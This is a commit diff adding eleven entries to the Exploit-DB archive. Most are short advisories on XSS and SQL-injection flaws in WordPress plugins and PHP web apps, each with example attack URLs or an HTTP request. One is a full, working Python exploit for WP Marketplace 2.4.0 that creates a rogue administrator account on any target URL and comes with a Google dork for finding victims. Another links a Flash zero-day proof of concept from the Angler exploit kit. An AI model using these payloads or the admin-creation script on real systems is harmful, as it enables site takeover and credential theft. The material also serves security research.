DB: 2015-03-26

11 new exploits

files.csv

@@ -1717,7 +1717,7 @@ id,file,description,date,author,platform,type,port
 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
-2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
+2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@@ -32898,3 +32898,14 @@ id,file,description,date,author,platform,type,port
 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
 36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
+36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0
+36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
+36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
+36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
+36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0
+36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0
+36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0
+36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
+36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
+36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
+36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0

platforms/php/webapps/36481.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51216/info
+
+The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable.
+
+http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234 

platforms/php/webapps/36482.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51218/info
+
+Siena CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Siena CMS 1.242 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?err=[XSS] 

platforms/php/webapps/36483.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51220/info
+
+WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss] 

platforms/php/webapps/36484.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51221/info
+
+PHPB2B is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[patch]/list.php?do=search&q=[XSS] 

platforms/php/webapps/36485.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51227/info
+
+FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FuseTalk Forums 3.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 

platforms/php/webapps/36486.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51240/info
+
+Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- 

platforms/php/webapps/36487.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51241/info
+
+The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex= 

platforms/php/webapps/36488.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51244/info
+
+WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WHOIS 1.4.2.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss] 

platforms/php/webapps/36489.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/51254/info
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TextPattern 4.4.1 is vulnerable; other versions may also be affected. 
+
+POST /textpattern/setup/index.php HTTP/1.1
+
+Host: A.B.C.D
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
+Gecko/20100101 Firefox/8.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/textpattern/setup/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 156
+
+duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
+Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
+Config 

platforms/php/webapps/36490.py

@@ -0,0 +1,183 @@
+#!/usr/bin/python
+#
+# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
+#
+# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
+#
+# Exploit written by Claudio Viviani
+#
+#
+#
+# --------------------------------------------------------------------
+#
+# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
+#
+# function ajaxinit(){
+#     if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
+#	    if(function_exists($_POST['execute']))
+#		    call_user_func($_POST['execute'],$_POST);
+#	    else
+#		    echo __("function not defined!","wpmarketplace");
+#	    die();
+#	  }
+#}
+#
+# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
+# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
+#
+#         if (function_exists($_POST['execute']))
+#             call_user_func($_POST['execute'], $_POST);
+#         else
+#         ...
+#         ...
+#         ...
+#
+# $_POST data needs to be an array
+#
+#
+# The wordpress function wp_insert_user is perfect:
+#
+# http://codex.wordpress.org/Function_Reference/wp_insert_user
+#
+# Description
+#
+# Insert a user into the database.
+#
+# Usage
+#
+# <?php wp_insert_user( $userdata ); ?>
+#
+# Parameters
+#
+# $userdata
+#     (mixed) (required) An array of user data, stdClass or WP_User object.
+#        Default: None
+#
+#
+#
+# Evil POST Data (Add new Wordpress Administrator):
+#
+# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
+#
+# ---------------------------------------------------------------------
+#
+# Dork google:  index of "wpmarketplace"
+#
+# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
+#
+# Http connection
+import urllib, urllib2, socket
+#
+import sys
+# String manipulator
+import string, random
+# Args management
+import optparse
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+# Check if file exists and has readable
+def checkfile(file):
+    if not os.path.isfile(file) and not os.access(file, os.R_OK):
+        print '[X] '+file+' file is missing or not readable'
+        sys.exit(1)
+    else:
+        return file
+
+def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+banner = """
+    ___ ___               __                                         
+   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
+   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
+   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
+   |:      |                |__|                                     
+   |::.|:. |                                                         
+   `--- ---'                                                         
+       ___ ___            __          __         __                  
+      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
+      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
+      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
+      |:  |   |                           |__|                       
+      |::.|:. |                                                      
+      `--- ---'                                                      
+                                                          WP Marketplace
+                                                      R3m0t3 C0d3 Ex3cut10n
+                                                         (Add WP Admin)
+                                                             v2.4.0
+
+                               Written by:
+
+                             Claudio Viviani
+
+                          http://www.homelab.it
+
+                             info@homelab.it
+                         homelabit@protonmail.ch
+
+                   https://www.facebook.com/homelabit
+                      https://twitter.com/homelabit
+                    https://plus.google.com/+HomelabIt1/
+           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+commandList.add_option('--timeout', action="store", default=10, type="int",
+                  help="[Timeout Value] - Default 10",
+                  )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+host = checkurl(options.target)
+timeout = options.timeout
+
+print(banner)
+
+socket.setdefaulttimeout(timeout)
+
+username = id_generator()
+pwd = id_generator()
+
+body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
+                         'execute' : 'wp_insert_user',
+                         'user_login' : username,
+                         'user_pass' : pwd,
+                         'role' : 'administrator'})
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+print "[+] Tryng to connect to: "+host
+try:
+    req = urllib2.Request(host+"/", body, headers)
+    response = urllib2.urlopen(req)
+    html = response.read()
+
+    if html == "":
+       print("[!] Account Added")
+       print("[!] Location: "+host+"/wp-login.php")
+       print("[!] Username: "+username)
+       print("[!] Password: "+pwd)
+    else:
+       print("[X] Exploitation Failed :(")
+
+except urllib2.HTTPError as e:
+    print("[X] "+str(e))
+except urllib2.URLError as e:
+    print("[X] Connection Error: "+str(e))
+

platforms/windows/remote/36491.txt

@@ -0,0 +1,11 @@
+Source: https://github.com/SecurityObscurity/cve-2015-0313
+
+PoC: http://www.exploit-db.com/sploits/36491.zip
+
+Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
+
+Reference:
+
+http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
+http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html
+https://helpx.adobe.com/security/products/flash-player/apsa15-02.html